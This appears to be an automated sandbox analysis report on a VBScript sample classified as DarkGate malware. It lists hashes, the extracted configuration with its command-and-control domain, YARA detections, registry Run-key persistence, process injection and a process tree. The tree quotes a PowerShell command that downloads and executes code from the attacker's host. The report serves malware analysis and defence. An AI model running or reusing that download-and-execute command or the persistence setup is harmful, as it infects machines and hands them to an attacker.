Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-12-2024 10:32
Static task: static1
Behavioral task: behavioral1
Sample: filter0912.2.vbs
Resource: win7-20240729-en
General
Target: filter0912.2.vbs
Size: 250B
MD5: 0f5e506c6622ef23867764b600e2c4b4
SHA1: e6b079ecc9537672cc3b8390b0509770045b9bbd
SHA256: 793b4e318eba9ef99173836a92ef2959a9ff73026647c0714ab7280f0dbe3fac
SHA512: 48fca5308d3a37a7ab974c299c689ce8122b355eb44fe8bc033c80481f73fe74c13586b122d8e86fcd4d26d24153e5a034a8e7262801e3716a2010cbbc8f0b85
Malware Config
Extracted
darkgate
drk3
todayput.shop
anti_analysis: false
anti_debug: false
anti_vm: false
c2_port: 80
check_disk: false
check_ram: false
check_xeon: false
crypter_au3: false
crypter_dll: false
crypter_raw_stub: false
internal_mutex: sEhfQzVh
minimum_disk: 100
minimum_ram: 4096
ping_interval: 6
rootkit: false
startup_persistence: true
username: drk3
Signatures
Darkgate family
Detect DarkGate stealer 7 IoCs
resource | yara_rule
behavioral2/memory/624-43-0x00000000026E0000-0x0000000002E82000-memory.dmp | family_darkgate_v6
behavioral2/memory/624-50-0x00000000026E0000-0x0000000002E82000-memory.dmp | family_darkgate_v6
behavioral2/memory/624-51-0x00000000026E0000-0x0000000002E82000-memory.dmp | family_darkgate_v6
behavioral2/memory/624-49-0x00000000026E0000-0x0000000002E82000-memory.dmp | family_darkgate_v6
behavioral2/memory/624-53-0x00000000026E0000-0x0000000002E82000-memory.dmp | family_darkgate_v6
behavioral2/memory/624-52-0x00000000026E0000-0x0000000002E82000-memory.dmp | family_darkgate_v6
behavioral2/memory/4820-54-0x0000000002600000-0x0000000002DA2000-memory.dmp | family_darkgate_v6
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description | pid | Process | procid_target
PID 2272 created 3940 | 2272 | Autoit3.exe | 59
PID 2272 created 2748 | 2272 | Autoit3.exe | 47
PID 624 created 4044 | 624 | GoogleUpdateCore.exe | 60
Blocklisted process makes network request 2 IoCs
flow | pid | Process
7 | 3196 | powershell.exe
8 | 3196 | powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | WScript.exe
Executes dropped EXE 1 IoCs
pid | Process
2272 | Autoit3.exe
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dbegdck = "\"C:\\ProgramData\\hcbchdd\\Autoit3.exe\" C:\\ProgramData\\hcbchdd\\eehhkhe.a3x" | GoogleUpdateCore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dbegdck = "\"C:\\ProgramData\\hcbchdd\\Autoit3.exe\" C:\\ProgramData\\hcbchdd\\eehhkhe.a3x" | GoogleUpdateCore.exe
Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs
Uses AutoIT, possibly to run an automated script.
pid | Process
2272 | Autoit3.exe
Command and Scripting Interpreter: PowerShell 1 IoCs
pid | Process
3196 | powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WMIC.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | GoogleUpdateCore.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | GoogleUpdateCore.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Autoit3.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Autoit3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Autoit3.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | GoogleUpdateCore.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | GoogleUpdateCore.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | GoogleUpdateCore.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | GoogleUpdateCore.exe
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid | Process | occurrences
3196 | powershell.exe | 2
2272 | Autoit3.exe | 6
624 | GoogleUpdateCore.exe | 4
4820 | GoogleUpdateCore.exe | 2
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
624 | GoogleUpdateCore.exe
Suspicious use of AdjustPrivilegeToken 43 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3196 | powershell.exe
The following sequence of 21 tokens is recorded twice for pid 4552 (WMIC.exe), giving the remaining 42 IoCs:
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 4552 | WMIC.exe
Suspicious use of WriteProcessMemory 19 IoCs
description | pid | Process | procid_target | occurrences
PID 4712 wrote to memory of 3196 | 4712 | WScript.exe | 83 | 2
PID 4712 wrote to memory of 2272 | 4712 | WScript.exe | 85 | 3
PID 2272 wrote to memory of 908 | 2272 | Autoit3.exe | 86 | 3
PID 908 wrote to memory of 4552 | 908 | cmd.exe | 88 | 3
PID 2272 wrote to memory of 624 | 2272 | Autoit3.exe | 93 | 4
PID 624 wrote to memory of 4820 | 624 | GoogleUpdateCore.exe | 94 | 4
Processes
- C:\Windows\system32\taskhostw.exe
  Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  PID: 2748
  - C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe
    Command line: "C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of WriteProcessMemory
    PID: 624
- C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  Command line: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  PID: 3940
- C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID: 4044
  - C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe
    Command line: "C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID: 4820
- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\filter0912.2.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 4712
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri http://todayput.shop:8080/wntpswdm)
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 3196
  - C:\bhqs\yyii\Autoit3.exe
    Command line: "C:\bhqs\yyii\Autoit3.exe" C:\bhqs\yyii\script.a3x
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Command and Scripting Interpreter: AutoIT
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 2272
    - \??\c:\windows\SysWOW64\cmd.exe
      Command line: "c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\hcbchdd\beecfkf
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 908
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        Command line: wmic ComputerSystem get domain
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        PID: 4552
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (2)
  - AutoHotKey & AutoIT (1)
  - PowerShell (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
Downloads